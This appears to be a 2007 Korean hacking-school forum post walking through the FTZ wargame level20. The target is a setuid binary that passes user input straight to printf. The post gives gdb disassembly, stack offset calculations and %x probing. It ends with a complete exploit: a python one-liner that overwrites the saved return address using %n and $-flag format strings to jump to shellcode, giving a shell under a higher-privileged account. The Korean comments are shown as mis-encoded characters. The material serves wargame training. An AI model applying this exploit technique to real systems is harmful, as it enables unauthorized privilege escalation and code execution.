|
http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=2580 [º¹»ç]
level20 / printf ÇÔ¼öÀÇ RET°ªÀ» º¯°æÇÏ¿© ½©ÄÚµå ½ÇÇàÇϱâ.
[level20@ftz in]$ cat ~/hint
#include <stdio.h>
main(int argc,char **argv)
{ char bleh[80];
setreuid(3101,3101);
fgets(bleh,79,stdin);
printf(bleh);
}
[level20@ftz in]$ ./egg 512 300
Using address: 0xbffff95c
[level20@ftz in]$ gdb -q ~/attackme
(gdb) disass main
Dump of assembler code for function main:
0x080483b8 <main+0>: push %ebp
0x080483b9 <main+1>: mov %esp,%ebp
0x080483bb <main+3>: sub $0x58,%esp
0x080483be <main+6>: and $0xfffffff0,%esp
0x080483c1 <main+9>: mov $0x0,%eax
0x080483c6 <main+14>: sub %eax,%esp
0x080483c8 <main+16>: sub $0x8,%esp
0x080483cb <main+19>: push $0xc1d
0x080483d0 <main+24>: push $0xc1d
0x080483d5 <main+29>: call 0x80482f8 <setreuid>
0x080483da <main+34>: add $0x10,%esp
0x080483dd <main+37>: sub $0x4,%esp
0x080483e0 <main+40>: pushl 0x80495c0
0x080483e6 <main+46>: push $0x4f
0x080483e8 <main+48>: lea 0xffffffa8(%ebp),%eax
0x080483eb <main+51>: push %eax
0x080483ec <main+52>: call 0x80482c8 <fgets>
0x080483f1 <main+57>: add $0x10,%esp
0x080483f4 <main+60>: sub $0xc,%esp
0x080483f7 <main+63>: lea 0xffffffa8(%ebp),%eax
0x080483fa <main+66>: push %eax
0x080483fb <main+67>: call 0x80482e8 <printf>
0x08048400 <main+72>: add $0x10,%esp
0x08048403 <main+75>: leave
0x08048404 <main+76>: ret
0x08048405 <main+77>: nop
0x08048406 <main+78>: nop
0x08048407 <main+79>: nop
End of assembler dump.
(gdb) br *main+1
Breakpoint 1 at 0x80483b9
(gdb) r
Starting program: /home/level20/attackme
Breakpoint 1, 0x080483b9 in main ()
(gdb) x/x $esp
0xbffff0c8: 0xbffff0e8
(gdb)
0xbffff0cc: 0x40038917
(gdb)
/// GDB¸¦ ÅëÇØ, main+0±îÁö ½ÇÇàµÈ »óÅ¿¡¼ÀÇ ½ºÅÃÆ÷ÀÎÅÍ(esp=0xbffff0c8)ÀÇ °ªÀº 0xbffff0e8(=ÀÌÀüebpÁÖ¼Ò).
/// ÇöÀ罺ÅÃÆ÷ÀÎÅÍ+0x4(esp+0x4) = RETÁÖ¼Ò°¡ ÀúÀåµÈ ½ºÅÃÀÇ À§Ä¡.
/// ÀÌÀüebpÁּҷκÎÅÍ RETÁÖ¼Ò°¡ ÀúÀåµÈ ½ºÅà ±îÁöÀÇ °Å¸®´Â 0xbffff0e8 - 0xbffff0cc = 0x1c(=28)
[level20@ftz in]$ gdb -q ~/attackme
(gdb) br *main+1
Breakpoint 1 at 0x80483b9
(gdb) r
Starting program: /home/level20/attackme
Breakpoint 1, 0x080483b9 in main ()
(gdb) disass printf
Dump of assembler code for function printf:
0x40074f80 <printf+0>: push %ebp
0x40074f81 <printf+1>: mov %esp,%ebp
0x40074f83 <printf+3>: sub $0x18,%esp
0x40074f86 <printf+6>: mov %ebx,0xfffffffc(%ebp)
0x40074f89 <printf+9>: mov 0x8(%ebp),%eax
0x40074f8c <printf+12>: lea 0xc(%ebp),%edx
0x40074f8f <printf+15>: call 0x4003877d <__i686.get_pc_thunk.bx>
0x40074f94 <printf+20>: add $0xe422c,%ebx
0x40074f9a <printf+26>: mov %eax,0x4(%esp,1)
0x40074f9e <printf+30>: mov 0x118(%ebx),%eax
0x40074fa4 <printf+36>: mov %edx,0x8(%esp,1)
0x40074fa8 <printf+40>: mov (%eax),%eax
0x40074faa <printf+42>: mov %eax,(%esp,1)
0x40074fad <printf+45>: call 0x4006a690 <vfprintf>
0x40074fb2 <printf+50>: mov 0xfffffffc(%ebp),%ebx
0x40074fb5 <printf+53>: mov %ebp,%esp
0x40074fb7 <printf+55>: pop %ebp
0x40074fb8 <printf+56>: ret
0x40074fb9 <printf+57>: nop
0x40074fba <printf+58>: nop
0x40074fbb <printf+59>: nop
0x40074fbc <printf+60>: nop
0x40074fbd <printf+61>: nop
0x40074fbe <printf+62>: nop
0x40074fbf <printf+63>: nop
End of assembler dump.
(gdb) br *printf+1
Breakpoint 2 at 0x40074f81
(gdb) c
Continuing.
%x%x%x
Breakpoint 2, 0x40074f81 in printf () from /lib/libc.so.6
(gdb) x/x $esp
0xbffff058: 0xbffff0c8
(gdb)
0xbffff05c: 0x08048400
(gdb)
/// GDB¸¦ ÅëÇØ, printf+0±îÁö ½ÇÇàµÈ »óÅ¿¡¼ÀÇ ½ºÅÃÆ÷ÀÎÅÍ(esp=0xbffff058)ÀÇ °ªÀº 0xbffff0c8(=ÀÌÀüebpÁÖ¼Ò).
/// ÇöÀ罺ÅÃÆ÷ÀÎÅÍ+0x4(esp+0x4) = RETÁÖ¼Ò°¡ ÀúÀåµÈ ½ºÅÃÀÇ À§Ä¡.
/// main ÇÔ¼öÀÇ ÀÌÀüebpÁּҷκÎÅÍ RETÁÖ¼Ò°¡ ÀúÀåµÈ ½ºÅà ±îÁöÀÇ °Å¸®´Â 0xbffff0e8 - 0xbffff05c = 0x8c(=140)
/// (printf ÇÔ¼öÀÇ ÀÌÀüebpÁּҷκÎÅÍ RETÁÖ¼Ò°¡ ÀúÀåµÈ ½ºÅà ±îÁöÀÇ °Å¸®´Â 0xbffff0c8 - 0xbffff05c = 0x6c(=108))
* ½ºÅÃÀÇ ±¸Á¶
data in/out
| |
+--------------- ------+
| data | .
+--------------- ------+
| data | .
+--------------- ------+
| ebpÀÇÁÖ¼Ò : 0xbffff0c8 | $esp(=0xbffff058) (E) ^
+--------------- ------+ |
| RET °ª : 0x08048400 | 0xbffff05c (D) +----- printf ÇÔ¼öÀÇ ½ºÅúκÐ
+--------------- ------+
| data | .
+--------------- ------+
| data | .
+--------------- ------+
| ebpÀÇÁÖ¼Ò : 0xbffff0e8 | $esp(=0xbffff0c8) (C) ^
+--------------- ------+ |
| RET °ª : 0x40038917 | 0xbffff0cc (B) +----- main ÇÔ¼öÀÇ ½ºÅúκÐ
+--------------- ------+
| data | .
+--------------- ------+
| data | .
+--------------- ------+
| data | .
+--------------- ------+
| ebpÀÇÁÖ¼Ò | 0xbffff0e8 (A)
+--------------- ------+
| RET °ª | 0xbffff0ec
+--------------- ------+
/// hint¿¡¼ È®ÀÎÇÑ ¹Ù·Î´Â, ~/attackme ÇÁ·Î±×·¥Àº Æ÷¸Ë½ºÆ¼¸µ ¹ö±×°¡ ÀÖ°í,
/// fgets(bleh,79,stdin); ¿¡ ÀÇÇؼ, 79°³ÀÇ ¹®ÀÚ¿À» printf·Î ³Ñ±æ¼ö ÀÖ´Ù..
/// ½©»óÅ¿¡¼ÀÇ RETÁÖ¼Ò¸¦ È®ÀÎÇغ¸ÀÚ.
[level20@ftz in]$ ~/attackme
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
4f401574604009d500782578257825782578257825782578257825782578257825782578257825782578257825782578257825782578257825782578257825782578257825782578257825782578257825782578258007825401591c040015360bffff0c8400389171bffff0f4bffff0fc4001582c180483080804832980483b81bffff0f48048408
/// À§¿Í °°Àº ¹æ¹ýÀ¸·Î Æ÷¸ä½ºÆ®¸µ¹ö±×¸¦ ÀÌ¿ëÇÏ¿©, %x¸¦ ÃÖ´ë 39°³±îÁö(78¹®ÀÚ¿) ³Ñ±æ¼ö ÀÖ´Ù.
/// À̶§Ãâ·ÂµÇ´Â °ªÀº, Ãâ·ÂµÇ´Â ¼ø°£ÀÇ ÇöÀç %espÀÇ °ªºÎÅÍ, +0x4 ¾¿ ¼øÂ÷ÀûÀ¸·Î Ãâ·ÂµÇ´Â°Í °°´Ù.
/// À§ °á°ú¿¡¼, ±âÁØÀÌ µÇ´Â mainÇÔ¼öÀÇ RET°ªÀ» È®ÀÎÇغ¸´Ï, ....bffff0c840038917... ¶ó°í È®ÀÎÇÒ ¼ö ÀÖ´Ù.
/// (bffff0c8 ´Â
/// À§Ç¥¿¡¼´Â $esp(=0xbffff0c8) --> ebpÀÇÁÖ¼Ò : 0xbffff0e8 (C) ºÎºÐÀÇ,
/// ebpÀÇÁÖ¼Ò : 0xbffff0e8 ÁÖ¼Ò¿Í ´ëÀÀµÇ´Â°ÍÀÌ´Ù. (gdb»óÅ¿¡¼ÀÇ ½ÇÇà°ú shell»óÅ¿¡¼ÀÇ ½ÇÇàÀÌ ´Ù¸¥ ÀÌÀ¯ÀÓ)
/// Ç¥¿¡¼ (E)ºÎºÐ°ú´Â º°°³ÀÌ´Ù. È¥µ·ÁÖÀÇ)
/// Áï, 0xbffff0c8-0x8c(=140) = 0xBFFFF03C ÁÖ¼Ò¿¡ printf ÇÔ¼ö¿¡¼ »ç¿ëÇÒ ÀÌÀüÇÔ¼ö(main)ÀÇ RET°ª(0x08048400)ÀÌ ÀúÀåµÇ¾î ÀÖ´Ù°í À¯ÃßÇÒ¼ö ÀÖ´Ù.
/// ( 0xbffff0c8-0x1c= 0xBFFFF0AC ÁÖ¼Ò¿¡´Â mainÇÔ¼ö¿¡¼ »ç¿ëÇÒ ÀÌÀüÇÔ¼öÀÇ RET°ª(840038917)ÀÌ ÀúÀåµÇ¾î ÀÖ´Ù°í À¯ÃßÇÒ¼ö ÀÖ´Ù.)
/// [level20@ftz in]$ ~/attackme
/// %x%x%x%x%x%x%x%x%x..........
/// À§¿Í °°Àº ¹æ¹ýÀ¸·Î, Á÷Á¢ printfÇÔ¼ö°¡ »ç¿ëÇÏ´Â RET°ª(0x08048400)À» ãÀ»¼öµµ ÀÖ°ÚÀ¸³ª,
/// °ø°Ý´ë»ó ÇÁ·Î±×·¥ fgets ÇÔ¼ö°¡.. Ç¥ÁØÀԷµǾîÁø ¹®ÀÚ¿À» 79°³±îÁö¸¸ ÇÑÁ¤Ç߱⶧¹®¿¡...
/// ±× ¹üÀ§¸¦ ¹þ¾î³ª´Â printfÇÔ¼ö°¡ »ç¿ëÇÏ´Â RET°ª±îÁö´Â ÃßÀûÇÒ ¼ö ¾ø¾ú´Ù...
/// °ø°ÝÁغñ
[level20@ftz in]$ ~/attackme
AAAABBBB %x %x %x %x %x
AAAABBBB 4f 40157460 4009d500 41414141 42424242
/// À§ °á°ú·Î½á, $-flag¸¦ ÀÌ¿ëÇؼ format string°ø°ÝÀ» ÇÒ¼ö ÀÖ´Ù.
/// mainÀÇ 0xBFFFF03CÁÖ¼Ò¿¡ µé¾îÀÖ´Â Á¤»óÀûÀÎ RET°ª(0x08048400)À»,
/// ½©Äڵ尡 ½ÃÀ۵Ǵ °÷ÀÇ ÁÖ¼Ò·Î µ¤¾î¾º±âÇÒ°ÍÀÌ´Ù.
Using address: 0xbffff95c
0xf95c =63836
63836-8byte = 63828
0x1bfff = 114687
114687-63836=50851
"\x3c\xf0\xff\xbf"+"\x3e\xf0\xff\xbf" -- 8byte
"%63828x%4$n%50851x%5$n"
[level20@ftz in]$ (python -c 'print "\x3c\xf0\xff\xbf"+"\x3e\xf0\xff\xbf"+"%63828x%4$n%50851x%5$n"';cat) | ~/attackme
..............»ý·«............................
40157460
id
uid=3101(clear) gid=3100(level20) groups=3100(level20)
my-pass
TERM environment variable not set.
clear Password is "************************".
---------------------------------------------------------------------------------------------
Âü°í¹®¼--
How to make shellcode in linux for beginners ( http://hdp.null2root.org/system/willy_sc.txt )
Format-String-Bug ÀÌÇØÇϱâ (http://badnom.com/211)
$-flag¸¦ ÀÌ¿ëÇÑ Format String °ø°Ý (http://x82.inetcop.org/h0me/papers/$-flag-formatstring.txt)
ÇØÄ¿½ºÄð Áú¹®°ú´äº¯°Ô½ÃÆÇ randomkid´ÔÀÇ ±Û (http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=2578) |
Hit : 3829 Date : 2007/11/23 03:44
|
2844, 
1/143 
